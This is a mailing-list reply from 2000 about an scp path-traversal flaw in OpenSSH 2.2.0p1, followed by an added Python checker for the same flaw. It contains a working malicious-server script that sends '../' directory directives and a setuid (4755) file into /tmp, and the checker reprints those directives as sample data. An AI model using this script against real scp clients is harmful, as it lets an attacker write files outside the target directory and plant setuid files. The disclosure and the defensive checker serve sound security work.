Subject: Re: openssh2.2.p1 - Re: scp file transfer hole
From: Robert Bihlmeyer (robbe@ORCUS.PRIV.AT)
Date: Mon Oct 02 2000 - 12:06:01 CDT
Martin MaD Douda <martin@DOUDA.NET> writes:
> Using your scripts I could make suid scpuser's file in /tmp, but probably
> due to some protocol change in scp, the file was empty and scp has died
> with "lost connection".
It worked much better for me once I removed all "of=/dev/stdout" from
the script. All dd versions that I know have stdout as default output
target, anyway. The new version created a 200 byte file alright:
--
#!/bin/bash
echo "D0755 0 ../../../../../../tmp/nope"
echo "D0755 0 ../../../../../../tmp"
echo "C4755 200 ScpIsBuggy"
dd if=/dev/urandom bs=200 count=1 2>/dev/null
dd if=/dev/zero bs=1 count=2 2>/dev/null
--
> Since openssh 2.2.0p1 is latest existing version, this vulnerability
> probably exists in every single scp version in the world.
Data Fellows/SSH Communication Security's ssh 2 uses a different file transfer protocol. So the above exploit won't work. That doesn't mean that there are more sanity checks, though.
-- Robbe
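As an added illustration (not code from this thread or from any scp implementation), here is a small Python checker that applies the sink-side sanity checks the thread shows to be missing: every name in a D or C directive must be a single path component, and setuid/setgid/sticky bits sent by the remote side must not be honoured. The sample directives are constructed from the script above; the function names are my own.

```python
import re
import stat

# Constructed sample of the scp control stream the script above emits.
# D = enter directory (mode size name), C = file (mode size name),
# E = leave directory, T = timestamps.
SAMPLE_DIRECTIVES = [
    "D0755 0 ../../../../../../tmp/nope",
    "D0755 0 ../../../../../../tmp",
    "C4755 200 ScpIsBuggy",
    "E",
]

_DIRECTIVE_RE = re.compile(r"^([CD])([0-7]{4}) (\d+) (.+)$")
_SPECIAL_BITS = stat.S_ISUID | stat.S_ISGID | stat.S_ISVTX


def check_directive(line):
    """Return (ok, detail). ok=False means a hardened sink should reject it.

    E and T directives carry no name or mode and are passed through.
    """
    if line == "E" or line.startswith("T"):
        return True, "control directive"
    m = _DIRECTIVE_RE.match(line)
    if not m:
        return False, "malformed directive"
    kind, mode_str, size, name = m.groups()
    # The name is meant to be a bare file name inside the current target
    # directory; any separator or dot-entry lets the sender choose the path.
    if "/" in name or name in (".", ".."):
        return False, "path traversal in name: %r" % name
    # Mode bits beyond rwx are the sender's choice; clear them instead of
    # creating a setuid/setgid file owned by the receiving user.
    mode = int(mode_str, 8)
    if mode & _SPECIAL_BITS:
        return False, "special mode bits in %s (safe mode %04o)" % (
            mode_str, mode & 0o777)
    what = "dir" if kind == "D" else "file"
    return True, "%s %s (%s bytes)" % (what, name, size)


def audit(lines):
    """Return [(directive, reason)] for every line the sink should reject."""
    rejected = []
    for line in lines:
        ok, detail = check_directive(line)
        if not ok:
            rejected.append((line, detail))
    return rejected
```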